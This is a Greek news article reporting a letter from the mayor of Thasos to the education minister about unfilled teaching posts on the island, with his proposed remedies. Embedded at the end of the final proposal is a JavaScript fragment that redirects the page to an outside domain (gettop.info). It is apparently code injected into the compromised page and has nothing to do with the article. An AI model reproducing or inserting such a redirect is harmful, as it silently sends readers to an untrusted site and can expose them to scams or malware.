Κενά σε διδακτικό προσωπικό στα σχολεία της Θάσου

0
13

 

Tην κάλυψη των κενών διδακτικών θέσεων στα σχολεία όλων των βαθμίδων εκπαίδευσης στη Θάσο, λόγω άρνησης ή και αδυναμίας των εκπαιδευτικών να αποδεχτούν την τοποθέτησή τους σε σχολικές μονάδες του νησιού, ζητάει μετ’ επιτάσεως ο δήμαρχος του νησιωτικού δήμου, Κώστας Χατζηεμμανουήλ, με επιστολή του προς τον Νίκο Φίλη.

Στην επιστολή του ο δήμαρχος επισημαίνει μεταξύ άλλων ότι «για πολλοστή φορά η Θάσος δυσκολεύεται στην κάλυψη των αναγκών της σε διδακτικό προσωπικό λόγω άρνησης ή και αδυναμίας των εκπαιδευτικών να αποδεχτούν την τοποθέτησή τους σε σχολικές μονάδες του νησιού.

Γνωρίζουμε και αναγνωρίζουμε τις δυσκολίες του τόπου μας ως νησιωτικού δήμου. Κατανοούμε τις θέσεις των εκπαιδευτικών που προσκαλούνται να καλύψουν τις ανάγκες των σχολείων. Δεν μπορούμε όμως να συμβιβαστούμε με τη ζοφερή πραγματικότητα της αδυναμίας στελέχωσης των σχολικών μονάδων, παρόλες τις φιλότιμες προσπάθειες που καταβάλλουν οι Διευθυντές Εκπαίδευσης και τα υπηρεσιακά συμβούλια για την κάλυψη των κενών».

Σε μια προσπάθεια άμεσης αντιμετώπισης του προβλήματος και εξεύρεσης λύσης ο δήμαρχος Θάσου προτείνει μεταξύ άλλων:

– Αναβάθμιση της Θάσου σε περιοχή αυξημένων μορίων, (αν είναι δυνατόν 10, όπως και σε άλλες εξ ίσου δυσπρόσιτες περιοχές), έτσι ώστε να γίνει ελκυστική ή τουλάχιστον όχι απαγορευτική για τους εκπαιδευτικούς που δέχονται να υπηρετήσουν σ’ αυτήν.

-Επανένταξη του νησιού στις δυσπρόσιτες περιοχές όπου θα μπορούν να τοποθετηθούν τουλάχιστον για μια τριετία εκπαιδευτικοί.

-Ορισμό της Θάσου ως ξεχωριστή περιοχή μετάθεσης – απόσπασης – τοποθέτησης, ώστε οι εκπαιδευτικοί που την επιλέγουν ως προορισμό να γνωρίζουν εκ των προτέρων ότι η Θάσος είναι η μοναδική τους προτίμηση κι όχι η εναλλακτική επιλογή ανάμεσα και σε άλλες περιοχές του νομού Καβάλας που ασφαλώς είναι πιο ελκυστικές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here